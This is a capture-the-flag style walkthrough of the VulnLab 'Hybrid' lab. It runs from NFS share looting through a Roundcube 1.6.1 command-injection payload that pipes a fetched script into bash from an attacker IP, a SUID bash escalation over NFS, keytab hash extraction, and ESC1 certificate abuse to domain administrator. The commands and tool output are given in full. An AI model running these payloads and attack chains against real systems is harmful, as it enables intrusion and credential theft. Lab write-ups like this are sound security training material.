Post

VulnLab Hybrid

VulnLab Hybrid

VulnLab Hybrid

Hybrid

Recon

1
2
3
└─$ rustscan -g -a 10.10.165.181,10.10.165.182 -r 1-65535
10.10.165.181 -> [53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49670,49669,49668]
10.10.165.182 -> [22,25,80,110,111,143,587,995,993,2049,34053,34481,39271,45869,50389]

10.10.165.181 - dc01.hybrid.vl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49670,49669,49668 10.10.165.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 20:21 +05
Nmap scan report for 10.10.165.181
Host is up (0.092s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     tcpwrapped
88/tcp    open     tcpwrapped
135/tcp   open     tcpwrapped
139/tcp   open     tcpwrapped
389/tcp   open     tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2024-07-17T16:39:23
|_Not valid after:  2025-07-17T16:39:23
445/tcp   open     tcpwrapped
464/tcp   open     tcpwrapped
593/tcp   open     tcpwrapped
636/tcp   open     tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2024-07-17T16:39:23
|_Not valid after:  2025-07-17T16:39:23
3268/tcp  filtered globalcatLDAP
3269/tcp  open     tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2024-07-17T16:39:23
|_Not valid after:  2025-07-17T16:39:23
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Not valid before: 2024-12-15T15:17:59
|_Not valid after:  2025-06-16T15:17:59
|_ssl-date: 2024-12-16T15:20:59+00:00; -1m17s from scanner time.
5985/tcp  filtered wsman
9389/tcp  filtered adws
49664/tcp filtered unknown
49668/tcp filtered unknown
49669/tcp filtered unknown
49670/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-16T15:20:41
|_  start_date: N/A
|_clock-skew: mean: -1m17s, deviation: 0s, median: -1m17s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.52 seconds

10.10.165.182 - mail01.hybrid.vl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
└─$ nmap -sC -sV -p22,25,80,110,111,143,587,995,993,2049,34053,34481,39271,45869,50389 10.10.165.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 20:23 +05
Nmap scan report for 10.10.165.182
Host is up (0.089s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 60:bc:22:26:78:3c:b4:e0:6b:ea:aa:1e:c1:62:5d:de (ECDSA)
|_  256 a3:b5:d8:61:06:e6:3a:41:88:45:e3:52:03:d2:23:1b (ED25519)
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp    open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp   open  pop3     Dovecot pop3d
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL STLS RESP-CODES AUTH-RESP-CODE CAPA TOP PIPELINING UIDL
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      39629/udp   mountd
|   100005  1,2,3      41511/tcp6  mountd
|   100005  1,2,3      50389/tcp   mountd
|   100005  1,2,3      51678/udp6  mountd
|   100021  1,3,4      39771/udp6  nlockmgr
|   100021  1,3,4      41353/udp   nlockmgr
|   100021  1,3,4      45557/tcp6  nlockmgr
|_  100021  1,3,4      45869/tcp   nlockmgr
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: more IDLE have post-login listed LOGIN-REFERRALS capabilities ENABLE Pre-login LITERAL+ OK STARTTLS SASL-IR ID LOGINDISABLEDA0001 IMAP4rev1
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
|_ssl-date: TLS randomness does not represent time
587/tcp   open  smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
|_imap-capabilities: more IDLE have post-login listed LOGIN-REFERRALS ID ENABLE AUTH=LOGINA0001 LITERAL+ OK SASL-IR Pre-login AUTH=PLAIN capabilities IMAP4rev1
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
|_pop3-capabilities: SASL(PLAIN LOGIN) AUTH-RESP-CODE RESP-CODES USER CAPA TOP PIPELINING UIDL
2049/tcp  open  nfs      3-4 (RPC #100003)
34053/tcp open  mountd   1-3 (RPC #100005)
34481/tcp open  mountd   1-3 (RPC #100005)
39271/tcp open  status   1 (RPC #100024)
45869/tcp open  nlockmgr 1-4 (RPC #100021)
50389/tcp open  mountd   1-3 (RPC #100005)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.89 seconds

Attack Chain

mail01.hybrid.vl

Seems like there’s rpcbind and nfs available

1
2
3
└─$ showmount -e 10.10.165.182
Export list for 10.10.165.182:
/opt/share *

Let’s mount it and check the contents

1
└─$ sudo mount -t nfs 10.10.165.182:/opt/share /mnt/export 
1
2
3
4
5
6
└─$ ls -lha /mnt/export                                                                                                     
total 16K
drwxrwxrwx 2 nobody nogroup 4.0K Jun 18  2023 .
drwxr-xr-x 5 root   root    4.0K Dec 16 20:34 ..
-rw-r--r-- 1 root   root    5.9K Jun 18  2023 backup.tar.gz

Let’s analyze archive content

1
2
3
4
5
6
7
└─$ tar xvf backup.tar.gz -C backup 
etc/passwd
etc/sssd/sssd.conf
etc/dovecot/dovecot-users
etc/postfix/main.cf
opt/certs/hybrid.vl/fullchain.pem
opt/certs/hybrid.vl/privkey.pem
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ tree backup                    
backup
├── etc
│   ├── dovecot
│   │   └── dovecot-users
│   ├── passwd
│   ├── postfix
│   │   └── main.cf
│   └── sssd
│       └── sssd.conf
└── opt
    └── certs
        └── hybrid.vl
            ├── fullchain.pem
            └── privkey.pem

We have credentials in dovecot-users file

1
2
3
4
└─$ cat backup/etc/dovecot/dovecot-users 
admin@hybrid.vl:{plain}<REDACTED>
peter.turner@hybrid.vl:{plain}<REDACTED>

Seems like creds work for webmail successfully login as admin

There’s a message which mentions RoundCube’s Junk filter plugin

The version of application is Roundcube Webmail 1.6.1. There’s a nice blog regarding RCE vulnerability. It requires us to change email identity and mark email as junk. The blog provides PoC:

1
admin&curl${IFS}<IP>/shell${IFS}|${IFS}bash&@hybrid.vl

Now we need to change our email via Settings => Identities

Now we mark sent message as Junk

Exploit worked and we receive shell as www-data

Now, let’s enumerate and elevate our privileges. We find peter.turner user.

1
2
www-data@mail01:~/roundcube$ id peter.turner@hybrid.vl
uid=902601108(peter.turner@hybrid.vl) gid=902600513(domain users@hybrid.vl) groups=902600513(domain users@hybrid.vl),902601104(hybridusers@hybrid.vl)

We have write permissions, thus we can try elevating our privileges

1
2
3
4
5
╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:                                                                                                                                                                                                                       
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
-rw-r--r-- 1 root root 427 Jun 18  2023 /etc/exports
/opt/share *(rw,no_subtree_check)  

Change /etc/login.defs

1
2
3
4
5
6
7
8
<SNIP>
UID_MIN                  1000
UID_MAX                 902601109
<SNIP>
GID_MIN                  1000
GID_MAX                 902601109
<SNIP>

Now we copy bash to share

1
2
www-data@mail01:~/roundcube$ cp /bin/bash /opt/share/bash
www-data@mail01:~/roundcube$ 

On our attack box we create a new user with uid identical to peter.turner

1
2
└─$ id nfs_user                                                                                 
uid=902601108(nfs_user) gid=902601108(nfs_user) groups=902601108(nfs_user)

Try the following approach to add sticky bit

1
2
3
4
5
6
└─$ sudo su nfs_user
nfs_user@kali:/tmp$ cp /mnt/export/bash ./
nfs_user@kali:/tmp$ rm /mnt/export/bash
rm: remove write-protected regular file '/mnt/export/bash'? y
nfs_user@kali:/tmp$ chmod +s ./bash
nfs_user@kali:/tmp$ cp ./bash /mnt/export/

In case it doesn’t work, try just adding SUID directly to bash in share

1
nfs_user@kali:/tmp$ chmod +s /mnt/export/bash

As a result we have access as peter.turner

1
2
3
4
5
6
www-data@mail01:~/roundcube$ ls -lha /opt/share/
total 1.4M
drwxrwxrwx 2 nobody                 nogroup   4.0K Dec 16 17:42 .
drwxr-xr-x 4 root                   root      4.0K Jun 17  2023 ..
-rw-r--r-- 1 root                   root      5.9K Jun 18  2023 backup.tar.gz
-rwsr-sr-x 1 peter.turner@hybrid.vl 902601108 1.4M Dec 16 17:42 bash
1
2
3
www-data@mail01:~/roundcube$ /opt/share/bash -p
bash-5.1$ id
uid=33(www-data) gid=33(www-data) euid=902601108(peter.turner@hybrid.vl) egid=902601108 groups=902601108,33(www-data)

dc01.hybrid.vl

In peter.turner’s home directory we find kdbx file, which we can transfer using share. To access it we can use kpcli and luckily the password we found in dovecot-users works

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ kpcli               

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> open passwords.kdbx
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
eMail/
Internet/
hybrid.vl/
kpcli:/> cd hybrid.vl/
kpcli:/hybrid.vl> ls
=== Entries ===
1. domain                                                                 
2. mail                                                   mail01.hybrid.vl

kpcli:/hybrid.vl> show -f 0

 Path: /hybrid.vl/
Title: domain
Uname: peter.turner
 Pass: <REDACTED>
  URL: 
Notes: 

kpcli:/hybrid.vl> 

Let’s check creds with nxc

1
2
3
└─$ nxc smb 10.10.165.181 -u peter.turner -p '<REDACTED>' 
SMB         10.10.165.181   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hybrid.vl) (signing:True) (SMBv1:False)
SMB         10.10.165.181   445    DC01             [+] hybrid.vl\peter.turner:<REDACTED>

Now, we can gather domain info via bloodhound

1
2
3
4
5
└─$ bloodhound-python -u peter.turner -p '<REDACTED>' -d hybrid.vl -dc dc01.hybrid.vl -ns 10.10.165.181 --zip -c All
INFO: Found AD domain: hybrid.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.hybrid.vl
<SNIP>

Nothing interesting. We can check if ADCS is configured

1
2
3
4
5
6
7
└─$ nxc ldap 10.10.165.181 -u peter.turner -p '<REDACTED>' -M adcs
SMB         10.10.165.181   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hybrid.vl) (signing:True) (SMBv1:False)
LDAP        10.10.165.181   389    DC01             [+] hybrid.vl\peter.turner:<REDACTED> 
ADCS        10.10.165.181   389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.165.181   389    DC01             Found PKI Enrollment Server: dc01.hybrid.vl
ADCS        10.10.165.181   389    DC01             Found CN: hybrid-DC01-CA

Let’s run certipy to find if there are vulnerable templates

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
└─$ certipy find -u peter.turner -p '<REDACTED>' -dc-ip 10.10.165.181 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
<SNIP>
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
<SNIP>

Looks like HybridComputers template is vulnerable to ESC1, where Domain Computers can enroll. We saw that mail01 is domain joined host and it’s also a member of Domain Computers group

We know that peter.turner is root on mail01

1
2
3
4
5
6
7
8
9
peter.turner@hybrid.vl@mail01:~$ sudo -l
[sudo] password for peter.turner@hybrid.vl: 
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User peter.turner@hybrid.vl may run the following commands on mail01:
    (ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl# 

We can now extract the secrets from a keytab file on mail01

1
2
root@mail01:/home/peter.turner@hybrid.vl# ls -lha /etc/krb5.keytab 
-rw------- 1 root root 650 Jun 17  2023 /etc/krb5.keytab

To extach the secrets use KeyTabExtract

1
2
3
4
5
6
7
8
9
10
11
└─$ ~/tools/red-team/KeyTabExtract/keytabextract.py krb5.keytab 
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : <REDACTED>
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458

Since now we have hash for mail01, we can request certificate as mail01 and abuse ESC1 to gain administrative privileges in domain

1
2
3
4
5
6
7
8
9
└─$ certipy req -u 'mail01$'@hybrid.vl -hashes '<REDACTED>' -dc-ip 10.10.165.181 -ca hybrid-DC01-CA -template HybridComputers -upn administrator -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Now we can get administrator’s hash and login with evil-winrm

1
2
3
4
5
6
7
8
9
└─$ certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.165.181                                                                         
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -u Administrator -H <REDACTED> -i 10.10.165.181
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

https://api.vulnlab.com/api/v1/share?id=e5f9d721-b099-44a3-9c60-987ba5af90fa

This post is licensed under CC BY 4.0 by the author.